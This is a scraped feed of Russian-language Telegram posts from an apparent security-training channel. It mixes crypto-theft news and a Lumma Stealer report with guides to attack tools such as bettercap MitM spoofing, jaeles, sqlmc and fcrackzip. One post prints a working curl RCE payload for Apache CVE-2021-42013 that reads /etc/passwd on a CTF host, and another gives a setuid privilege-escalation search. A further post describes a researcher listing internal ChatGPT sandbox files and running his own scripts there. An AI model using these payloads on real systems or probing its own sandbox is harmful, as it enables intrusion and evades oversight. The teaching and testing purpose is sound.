This media is not supported in your browser
VIEW IN TELEGRAM
Англоязычный криптовалютный стример случайно раскрыл свою seed-фразу во время прямой трансляции, что привело к мгновенной утрате $100,000 (около 10 млн рублей).
Ошибка произошла из-за того, что на экране оказалось открыто приложение с заметками, где была сохранена резервная фраза. Злоумышленники тут же воспользовались этой информацией и вывели все средства.
🗣️ Это не первый подобный случай. В июле стример Дмитрий Dmitry_Lixxx Лиханов также случайно показал свою seed-фразу в эфире. Хоть часть средств и удалось вернуть, история обошлась ему в немалую сумму.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17🤯8😁6❤4😢3🔥1
В 2016 году Илья Лихтенштейн, 35-летний предприниматель российского происхождения, взломал одну из крупнейших криптобирж мира — Bitfinex. Он похитил 120 000 биткоинов, стоимость которых с $70 млн на момент кражи выросла до $10,7 млрд.
✏️ Приговор и сотрудничество с властями
На этой неделе федеральный суд США приговорил Лихтенштейна к 5 годам лишения свободы. Его жена, Хизер Морган, также обвиняется в участии в отмывании украденных средств. Она была вовлечена в процесс без подробных объяснений со стороны Лихтенштейна, а узнала о взломе лишь в 2019 году.
✏️ Лихтенштейн полностью признал свою вину и помог правоохранительным органам вернуть 96% украденных биткоинов, а также предоставил ценную информацию для расследований других киберпреступлений.
Громкая кража и уникальная схема
🔸 Украдено: 120 000 BTC
🔸 Отмыто: ~21% от суммы (около $14 млн)
🔸 Средства перемещались с использованием курьеров из Казахстана и Украины.
👀 Интересный факт: Хизер Морган, известная под псевдонимом Razzlekhan, — бизнесвумен и рэперша. Её приговор будет вынесен 18 ноября, и прокуратура запрашивает для неё 18 месяцев тюрьмы.
#новости
На этой неделе федеральный суд США приговорил Лихтенштейна к 5 годам лишения свободы. Его жена, Хизер Морган, также обвиняется в участии в отмывании украденных средств. Она была вовлечена в процесс без подробных объяснений со стороны Лихтенштейна, а узнала о взломе лишь в 2019 году.
Громкая кража и уникальная схема
🗣️ Сотрудники IRS назвали использованную Лихтенштейном схему отмывания одной из самых сложных, с которыми они сталкивались.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔16🔥7❤4👍4👎1😁1😈1
git clone https://github.com/k1nd0ne/VolWeb.git
openssl genrsa > ./privkey.pem
openssl req -new -x509 -key ./privkey.pem > ./fullchain.pem
cd VolWeb/docked
cp .env.aws.example .env
vim .env (or any text editor)
cd VolWeb/docker
docker-compose up
admin:password
user:password
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18🔥14❤5
Исследователь Марко Фигероа поделился своими исследованиями о получении широкого доступа к песочнице ChatGPT.
Сама песочница представляет из себя изолированную среду, позволяющую пользователям безопасно взаимодействовать с ней и быть изолированными от других пользователей.
✏️ Используя команду list files /home/sandbox/.openai_internal/ исследователю удалось получить информацию о конфигурации и настройках песочницы.
🏆 Воодушевившись найденными результатами, он получил возможность загружать в папку /mnt/data собственные Python-скрипты и выполнять их!
❗️ При этом стоит отметить, что песочница не предоставляет доступ к определённым конфиденциальным папкам и файлам (/root, /etc/shadow и т.д.).
👀 Однако OpenAI в своей bug bounty программе считает, что даже если таким путем можно извлечь файлы конфигурации, это все равно не является основанием для получения вознаграждения.
✔️ Вероятно, решение OpenAI оставить некоторые действия в «песочнице» как выходящие за рамки отражает их уверенность в стратегии сдерживания пользователя за пределы контейнера.
Сама песочница представляет из себя изолированную среду, позволяющую пользователям безопасно взаимодействовать с ней и быть изолированными от других пользователей.
🏆 Воодушевившись найденными результатами, он получил возможность загружать в папку /mnt/data собственные Python-скрипты и выполнять их!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍8❤7😁1
Старт: 2 декабря. Успейте приобрести курс по старой цене до конца ноября!
Содержание курса:
Получите практические навыки как в рабочих задачах, так и в Bug Bounty.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤6🎉4🥰1👾1
Права доступа в Linux💻
В правах доступа для файлов и каталогов приминяется одинаковый принцип. В целях упрощения права доступа разделены на три категории:
Для установки прав доступа используется такой шаблон:
Для практики можно создать простой скрипт который выводит надпись "hello world".
и посмотреть его права командой
Для примера у нас будет такой вывод:
Мы видим что для пользователя есть права на чтение и запись, для участников нашей группы есть право только читать, и у всех остальных тоже доступ только к чтению.
Запустить его мы не сможем, так как у скрипта нет на это прав. Для этого давайте изменим его права специальной командой
Теперь не только мы, но и пользователи нашей группы смогут использовать, читать и редактировать файл. Остальные только читать.
Для простоты можно заменить числа на буквы
В правах доступа для файлов и каталогов приминяется одинаковый принцип. В целях упрощения права доступа разделены на три категории:
r - чтение: 4;
w - запись: 2;
x - исполнение: 1;
Для установки прав доступа используется такой шаблон:
[User:r/w/x] [Group:r/w/x] [All:r/w/x]
Для практики можно создать простой скрипт который выводит надпись "hello world".
#!/bin/bash
echo "Hello world!"
и посмотреть его права командой
ls -la | grep 'main.sh'
Для примера у нас будет такой вывод:
-rw-r--r--
Мы видим что для пользователя есть права на чтение и запись, для участников нашей группы есть право только читать, и у всех остальных тоже доступ только к чтению.
Запустить его мы не сможем, так как у скрипта нет на это прав. Для этого давайте изменим его права специальной командой
chmod
:chmod 774 main.sh
Почему 774? Ответ: Мы прибегли с следующей формуле User/Group/All:4+2+1, где 4 - чтение, 2 - запись, 1 - исполнение. 4+2+1=7
Теперь не только мы, но и пользователи нашей группы смогут использовать, читать и редактировать файл. Остальные только читать.
Для простоты можно заменить числа на буквы
chmod +x main.shтакже будет работать и позволит скрипту исполниться.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍35❤9✍4👾1
NetScanner👴
Netscanner — это инструмент сканирования сети с такими функциями, как: Список интерфейсов оборудования, Переключение активного интерфейса для сканирования и дампа пакетов, Сканирование сетей WiFi, Уровень сигнала WiFi (с диаграммами), Pinging CIDR с именем хоста, oui и mac-адресом, Дамп пакетов (TCP, UDP, ICMP, ARP), Дамп пакетов, Запуск/пауза дампа пакетов.
Использование netscanner:
Запуск:
Netscanner — это инструмент сканирования сети с такими функциями, как: Список интерфейсов оборудования, Переключение активного интерфейса для сканирования и дампа пакетов, Сканирование сетей WiFi, Уровень сигнала WiFi (с диаграммами), Pinging CIDR с именем хоста, oui и mac-адресом, Дамп пакетов (TCP, UDP, ICMP, ARP), Дамп пакетов, Запуск/пауза дампа пакетов.
Использование netscanner:
-t, --tick-rate: Скорость тика, т.е. количество тиков в секунду (По умолчанию: 1)
-f, --frame-rate: Частота кадров, т.е. количество кадров в секунду (По умолчанию: 10)
-h, --help: Вывод помощи
-v, --version: Вывод версии программы
Запуск:
netscanner
Вы сможете увидеть сигнали WiFi в левом верхнем меню, в правом верхнем доступные интерфейсы, а снизу Пакеты, Порты, Трафик.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤10🔥5👾3
Компоненты AD Kerberos, Microsoft SQL Server и центр сертификации — как их взломать? 💬
Научим на курсе “Атака на Active Directory". Авторы: HackerRalf (Михаил Порываев) и BlackRabbit (Павел Никитин), 5-кратные победители the Standoff
Содержание курса:
🙂 Архитектура AD и ее базис
🙂 Харденинг в AD, добыча критичной информации, развитие по инфраструктуре
🙂 Как закрепиться внутри? Техники и эксплоиты
➡️ практическая лаборатория AD содержит более 30 виртуальных машин, позволяя участникам отточить свои навыки на практике в 100+ рабочих тасках
🌟 Сертификат / удостоверение о повышении квалификации
🌟 Старт: 16 декабря*
*Успейте приобрести курс по старой цене до конца ноября!
🚀 @Codeby_Academy
➡️ Узнать подробнее о курсе
➡️ Читайте отзывы от учеников предыдущих потоков здесь
Научим на курсе “Атака на Active Directory". Авторы: HackerRalf (Михаил Порываев) и BlackRabbit (Павел Никитин), 5-кратные победители the Standoff
Содержание курса:
*Успейте приобрести курс по старой цене до конца ноября!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17🔥12❤9
Forwarded from Codeby One — пентест глазами исполнителя
Дипфейк — это поддельное фото, видео или аудио, сгенерированное искусственным интеллектом для имитации внешности и голоса человека. При создании дипфейков нейросеть анализирует и копирует мимику, движения лица, интонацию и даже фон речи. 👀
В новой статье разбираем как работают дипфейки и как с ними бороться.
Основные инструменты создания дипфейков — это генеративно-состязательные сети (GAN), автоэнкодеры, рекуррентные сети (для аудио) и сложные алгоритмы трекинга движений лица.
Но в политике и преступной сфере дипфейки представляют угрозу, помогая манипулировать общественным мнением и обманывать людей. Преступники подделывают голоса и образы для вымогательства денег и распространения дезинформации.
Чем опасны дипфейки?
Дипфейки становятся мощным инструментом в руках мошенников, позволяя обманом получать доступ к деньгам и конфиденциальной информации. Среди опасностей:
🔸 Финансовое мошенничество
🔸 Обход систем безопасности
➡️ Читать полную версию статьи
В новой статье разбираем как работают дипфейки и как с ними бороться.
Основные инструменты создания дипфейков — это генеративно-состязательные сети (GAN), автоэнкодеры, рекуррентные сети (для аудио) и сложные алгоритмы трекинга движений лица.
🗣️ Сейчас дипфейки можно встретить как в развлекательной индустрии, так и в рекламе. Например, дипфейк с Брюсом Уиллисом использовался в рекламе «МегаФона», а в кинематографе они позволяют завершать съёмки с участием актёров, которые покинули проект, как это было с Полом Уокером в «Форсаже 7».
Но в политике и преступной сфере дипфейки представляют угрозу, помогая манипулировать общественным мнением и обманывать людей. Преступники подделывают голоса и образы для вымогательства денег и распространения дезинформации.
Чем опасны дипфейки?
Дипфейки становятся мощным инструментом в руках мошенников, позволяя обманом получать доступ к деньгам и конфиденциальной информации. Среди опасностей:
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21👍7❤5👾2
Telegram продолжает набирать популярность среди злоумышленников, использующих его для распространения вредоносных программ, таких как Lumma Stealer.
Lumma Stealer способен украсть огромное количество личной информации: логины, пароли, данные банковских карт, истории браузеров и многое другое.
⚙️ Как работает атака?
Lumma Stealer распространяется через Telegram-каналы, которые предлагают "крякнутые" программы или архивы с якобы безвредным ПО. Один из таких каналов, VIP HitMaster Program, насчитывает более 42,000 подписчиков, а второй, MegaProgram +, имеет 8660 подписчиков. Интересно, что оба канала часто пересылают друг другу сообщения, что делает их влияние ещё более широким.
В одном из разобранных случаев, злоумышленники замаскировали вредоносный файл под популярную программу CCleaner 2024 — средство для очистки системы и оптимизации производительности. Но после извлечения из архива (.rar) пользователи обнаруживали, что вместо ожидаемого установочного файла CCleaner, они получали два заражённых файла, одним из которых был Lumma Stealer. В частности, файл с названием XTb9DOBjB3.exe является вредоносным и используется для кражи конфиденциальной информации.
⚙️ Механизмы скрытности и обфускации
Файл был не просто вредоносным, но и тщательно замаскированным. Например, он скрывал код, который подключался к аккаунту на Steam, чтобы установить связь с командным сервером злоумышленника. Странным образом, имя пользователя было зашифровано и подключено к нескольким псевдонимам.
После дешифровки этого имени, вредоносное ПО связывалось с сервером командования и управления (C2), что позволяло атакующим не только красть данные, но и скачивать дополнительные вредоносные файлы. Все эти действия затрудняют обнаружение вредоносного ПО антивирусами и системами защиты.
💱 География атак
Больше всего атак в настоящее время подвергаются пользователи Telegram из Индии, за ними следуют пользователи из США и Европы. Это подтверждает, что злоумышленники стремятся охватить как можно более широкую аудиторию, используя Telegram как популярную платформу для доставки угроз.
🚨 Запомните, использование популярных платформ как каналов для распространения вредоносного ПО — это не что-то новое, но Telegram даёт злоумышленникам уникальные возможности для обхода защиты. Поэтому будьте особенно внимательны к тем файлам, которые вы скачиваете и открываете через этот мессенджер.
#новости
Lumma Stealer способен украсть огромное количество личной информации: логины, пароли, данные банковских карт, истории браузеров и многое другое.
Lumma Stealer распространяется через Telegram-каналы, которые предлагают "крякнутые" программы или архивы с якобы безвредным ПО. Один из таких каналов, VIP HitMaster Program, насчитывает более 42,000 подписчиков, а второй, MegaProgram +, имеет 8660 подписчиков. Интересно, что оба канала часто пересылают друг другу сообщения, что делает их влияние ещё более широким.
В одном из разобранных случаев, злоумышленники замаскировали вредоносный файл под популярную программу CCleaner 2024 — средство для очистки системы и оптимизации производительности. Но после извлечения из архива (.rar) пользователи обнаруживали, что вместо ожидаемого установочного файла CCleaner, они получали два заражённых файла, одним из которых был Lumma Stealer. В частности, файл с названием XTb9DOBjB3.exe является вредоносным и используется для кражи конфиденциальной информации.
Файл был не просто вредоносным, но и тщательно замаскированным. Например, он скрывал код, который подключался к аккаунту на Steam, чтобы установить связь с командным сервером злоумышленника. Странным образом, имя пользователя было зашифровано и подключено к нескольким псевдонимам.
После дешифровки этого имени, вредоносное ПО связывалось с сервером командования и управления (C2), что позволяло атакующим не только красть данные, но и скачивать дополнительные вредоносные файлы. Все эти действия затрудняют обнаружение вредоносного ПО антивирусами и системами защиты.
Больше всего атак в настоящее время подвергаются пользователи Telegram из Индии, за ними следуют пользователи из США и Европы. Это подтверждает, что злоумышленники стремятся охватить как можно более широкую аудиторию, используя Telegram как популярную платформу для доставки угроз.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍23❤6🔥3👾2
Мощная, легко расширяемая платформа, написанная на
Установка в
sudo apt update && sudo apt install bettercap
Установка via
docker pull bettercap/dev
docker run -it --privileged --net=host bettercap/dev -h
Запуск Web UI и интерактивной сессии:
sudo bettercap -caplet http-ui
sudo bettercap
Стандартные данные для входа:
Логин: user
Пароль: pass
Возможности:
Сканирование WiFi сетей, деаутентификация клиентов
Авто захват рукопожатий
Bluetooth сканирование
ARP, DNS, NDP and DHCPv6 спуферы для MitM атак
Мощный сетевой сниффер
Быстрый сканер портов
Удобный веб интерфейс
И многое другое
Please open Telegram to view this post
VIEW IN TELEGRAM
👍31❤9🔥5👾3👎1
🚩 Новые задания на платформе Codeby Games!
🕵️ Категория Форензика — В чём секрет кота Бориса?
🏆 Категория Квесты — SSL
🧰 Категория PWN — 0xLEET
Приятного хакинга!
🕵️ Категория Форензика — В чём секрет кота Бориса?
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍13❤6👾3🎉2😁1
Мощный, гибкий и легко расширяемый framework, написанный на
Установка:
go install github.com/jaeles-project/jaeles@latest
Установка сигнатур:
jaeles config init
Примеры запуска:
# Scan Usage example:
jaeles scan -s <signature> -u <url>
jaeles scan -c 50 -s <signature> -U <list_urls> -L <level-of-signatures>
jaeles scan -c 50 -s <signature> -U <list_urls>
jaeles scan -c 50 -s <signature> -U <list_urls> -p 'dest=xxx.burpcollaborator.net'
jaeles scan -c 50 -s <signature> -U <list_urls> -f 'noti_slack "{{.vulnInfo}}"'
jaeles scan -v -c 50 -s <signature> -U list_target.txt -o /tmp/output
jaeles scan -s <signature> -s <another-selector> -u http://example.com
jaeles scan -G -s <signature> -s <another-selector> -x <exclude-selector> -u http://example.com
cat list_target.txt | jaeles scan -c 100 -s <signature>
# Examples:
jaeles scan -s 'jira' -s 'ruby' -u target.com
jaeles scan -c 50 -s 'java' -x 'tomcat' -U list_of_urls.txt
jaeles scan -G -c 50 -s '/tmp/custom-signature/.*' -U list_of_urls.txt
jaeles scan -v -s '~/my-signatures/products/wordpress/.*' -u 'https://wp.example.com' -p 'root=[[.URL]]'
cat urls.txt | grep 'interesting' | jaeles scan -L 5 -c 50 -s 'fuzz/.*' -U list_of_urls.txt --proxy http://127.0.0.1:8080
jaeles server -s '/tmp/custom-signature/sensitive/.*' -L 2 --fi
Написал шаблон под RCE для веб сервера Apache 2.4.49-50
Задание на codeby.games с уязвимым сервером. На нем и проверим.
Запрос curl'ом выглядит так:
curl 'http://62.173.140.174:10009/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh' --data 'echo Content-Type: text/plain; echo; id && cat /etc/passwd'
Запуск:
./jaeles scan -s '~/.jaeles/base-signatures/cves/apache-rce-cve-2021-42013*' -u 'http://62.173.140.174:10009' -v
Кладем в директорию сигнатур и инициализируем конфиг:
./jaeles config init
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20❤13👎10🔥4✍2👾2🤯1😡1
SQLMC 💉
SQLMC (SQL Injection Massive Checker) — это инструмент, предназначенный для сканирования домена на предмет уязвимостей SQL-инъекций. Он сканирует указанный URL-адрес до указанной глубины, проверяет каждую ссылку на наличие уязвимостей SQL-инъекций и сообщает о своих результатах.
Использование sqlmc:
Например:
SQLMC (SQL Injection Massive Checker) — это инструмент, предназначенный для сканирования домена на предмет уязвимостей SQL-инъекций. Он сканирует указанный URL-адрес до указанной глубины, проверяет каждую ссылку на наличие уязвимостей SQL-инъекций и сообщает о своих результатах.
Использование sqlmc:
-u, --url: Сканирует URL
-d, --depth: Глубина сканирования
-o, --output: Сохранить файл с выводом
Например:
sqlmc -u http://example.com -d 2
👍48❤13🔥12👎1👾1
Установка:
pip install tartufo
Есть несколько режимов:
tartufo scan-folder [OPTIONS] TARGET
tartufo scan-local-repo [OPTIONS] REPO_PATH
tartufo scan-remote-repo [OPTIONS] GIT_URL
В основном интересен scan-remote-repo, проверил на своем репозитории, забыл убрать токен телеграм бота, на скрине все видно
tartufo scan-remote-repo https://github.com/akhomlyuk/pyradm
Токены заменены!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍39❤16🔥15😁2
Поиск файлов в Linux🔍
Существует несколько способов поиска файлов в Linux. Три основых - это команды
Команда
Для начала нужно её обновить:
Теперь можем использовать команду
Если результатов слишком много, используйте ключКомбинируйте это с командой grep о которой я рассказал тут и тогда вы получите больше примуществ.
Чтобы найти путь к файлу, введите команду
Преимущество команды
Или, если вы хотите найти большие файлы, то можно воспользоваться ключом
Можно также найти файлы setuid в Linux для повышения привелегий.
Существует несколько способов поиска файлов в Linux. Три основых - это команды
locate
, find
и which
.Команда
locate
хранит свои данные в базе данных, потому при поиске работает быстрее.Для начала нужно её обновить:
updatedb
Теперь можем использовать команду
locate
:locate [ИМЯ ФАЙЛА]
Если результатов слишком много, используйте ключ
-n
для того, чтобы ограничить вывод. Чтобы найти путь к файлу, введите команду
which
. Она использует переменную среды $PATH
для поиска результатов. Например, чтобы узнать где установлена та или иная программа, введите:which [ИМЯ ПРОГРАММЫ]
Преимущество команды
find
является её возможность добавлять более детальные фильтры, что найти что-то. Например, чтобы найти файл в корневом каталоге, можно использовать:find /home/user/ -name "file.txt"
Или, если вы хотите найти большие файлы, то можно воспользоваться ключом
-size
:find / -size +1G 2> /dev/null
2> /dev/null очистит вывод и отфильтрует ошибки
Можно также найти файлы setuid в Linux для повышения привелегий.
find / -perm -u=s -type f 2>/dev/null
✍44🔥18❤13👍3
fcrackzip 📂
Данный инструмент взламывает запароленные zip архивы.
По умолчанию программа не установлена, устанавливаем:
после этого запускаем с архивом:
Программа начнёт перебор возможных комбинаций паролей, придётся подождать. Время ожидания зависит от сложности пароля. Программа выдаст следующий результат по завершению.
Данный инструмент взламывает запароленные zip архивы.
По умолчанию программа не установлена, устанавливаем:
sudo apt install fcrackzip
после этого запускаем с архивом:
fcrackzip archive.zip
Программа начнёт перебор возможных комбинаций паролей, придётся подождать. Время ожидания зависит от сложности пароля. Программа выдаст следующий результат по завершению.
possible pw found: 123456seven
Где, 123456seven - и есть наш пароль.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍46👾23❤11👎4🔥3😁1